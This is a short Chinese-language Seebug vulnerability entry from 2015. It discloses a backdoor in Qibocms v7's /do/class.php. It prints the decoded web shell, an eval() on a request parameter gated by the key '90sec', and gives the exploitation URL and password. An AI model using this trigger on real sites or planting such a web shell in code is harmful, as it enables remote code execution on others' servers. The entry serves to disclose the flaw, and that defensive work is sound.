Qibocms v7 /do/class.php 后门

2015-05-04T00:00:00
ID SSV:89165
Type seebug
Reporter Root
Modified 2015-05-04T00:00:00

Description

<p>漏洞相关文件:</p><p>/do/class.php</p><p>后门内容</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434682387540-1.png" data-image-size="865,109"><br></p><p>解密后内容<br></p><pre class=""><?phpif($_GET['key']=='90sec')    @eval($_REQUEST['shellcode']);?></pre><p><br></p><p>漏洞利用过程</p><p>后门地址:<a href="http://domain/do/class.php?key=90sec">http://domain/do/class.php?key=90sec</a></p><p>密码:shellcode</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434682430825-1.png" data-image-size="865,758"><br></p>